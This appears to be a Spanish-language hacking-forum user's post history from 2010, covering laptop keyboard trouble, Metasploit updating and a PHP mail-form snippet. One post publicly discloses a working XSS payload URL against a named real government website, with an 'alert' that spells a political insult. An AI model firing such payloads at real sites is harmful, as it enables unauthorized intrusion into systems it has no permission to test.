|
121
|
Seguridad Informática / Nivel Web / Re: Recopilatorio de Vulnerabilidades de XSS/SQLinjection
|
en: 10 Diciembre 2010, 22:10 pm
|
Sitio web:http://www.buenosaires.gov.ar/areas/educacion/establecimientos/index.php?idgestion= Descubridor:clean735 URL del aviso:http://txt.io/clean735 Fecha de descubrimiento:10 de diciembre 2010 Fecha de notificación:10 de diciembre Fecha de publicación: 10 de diciembre Arreglado: no lo se Información adicional:no m gusta macri. XSS en el buscador http://www.buenosaires.gov.ar/areas/educacion/establecimientos/index.php?idgestion=0&idoferta&idsala=0&idjornada=0&idmodalidad=0&idtitulo=0&idbarrio&idcgpc&distrito&texto=%3Cimg+src%3D.+onerror%3Dalert%28String.fromCharCode%2877%2C97%2C99%2C114%2C105%2C95%2C110%2C97%2C122%2C105%29%29%3E&Buscar2=Buscar&redir=1&menu_id=10194
|
|
|
125
|
Seguridad Informática / Nivel Web / duda
|
en: 26 Noviembre 2010, 05:13 am
|
Hola. Hay algo aki?? (un bug q me contesto una web, ojala pudiera leer sus vulnerabilidades... a beber, salud) <?php function form_mail($sPara, $sAsunto, $sTexto, $sDe){
if ($sDe)$sDe = "From:".$sDe;
foreach ($_POST as $nombre => $valor) $sTexto = $sTexto."n".$nombre." = ".$valor;
return(mail($sPara, $sAsunto, $sTexto, $sDe)); }
if (form_mail("usuario@suweb.com", "Activación de formulario", "Los datos introducidos en el formulario son:nn", "tu@tuweb.com" ) ) echo "Su formulario ha sido enviado con exito";
?>
|
|
|
127
|
Seguridad Informática / Bugs y Exploits / Re: Actualización Metasploit
|
en: 16 Noviembre 2010, 02:28 am
|
Amigo tsaint, has tocado el peliagudisimo tema del MSF... Por alguna extraña razon, es mejor no hablar de ciertas cosas, como decia el gran Luca Prodan. Yo he tenido y tengo todos los problemas del mundo , pa actualizar, pa hacerlo tirar, y finalemente para eXplotarlo... Aunke finalmente anoche pude testearlo en esta makina (win xp), con un exploit rarisimo , y puedo concluir diciendo: el MSF SI funciona usandolo correctamente, y ya no me torturare como akellos alumnos del mito de la caverna de Platón, esperando a q me cuente el maestro como es la vida fuera de esta cueva. La verdad, no tengo ninguna solucion, pero comparto tu problema de actualizar (al menos en BackTrack4), asi como el entusiasmo este q me entro por haberlo hecho funcionar despues de casi un año dandole sin resultados... Ojala puedas arreglarlo, te mando good vibes techno chamanicas. Suerte!
|
|
|
129
|
Informática / Hardware / Re: Problemas con el teclado en HP Omnibook xe3
|
en: 9 Noviembre 2010, 13:01 pm
|
Simorg, Artikbot, gracias por contestar. Estos experimentos q planteais, me parecen viables, ni bien agarre un destornillador, pasamos a cirugia mayor. Tengo un colega q heredo una maquina recreativa y le metio el MAME dentro de una torre antigua, y con un teclado de esos blandos, cableo los joysticks originales y le kedo precioso. A ver como va, si no muere el HijoPuta (HP) definitivamente, sera todo un logro, gracias. Por cierto, el teclado tuvo un momento de resurreccion, y fue despues de estar usandolo varias horas con otro teclado plug and play, y siguio asi un rato largo, hasta q me movi con el portatil unos centimetros, con lo cual llegue a la conclusion q es algo de cableado/contactos. Salud-OS!
|
|
|
130
|
Informática / Hardware / Re: Problemas con el teclado en HP Omnibook xe3
|
en: 7 Noviembre 2010, 19:53 pm
|
Gracias por contestar Aprendiz-oscuro. El teclado del portatil sigue sin funcionar correctamente, al menos ahora se q es el hard, y no ningun fallo de la bios o algo asi. Con el Live de linux tampoco funciona...Creo q la unica solucion , es licenciar el teclado del portatil, y agregarle otro plugandplay y fuera... Lo de abrirlo me motiva mas bien poco mas q nada porq no sabria q hacer. Salud OS
|
|
|
|
|
|
|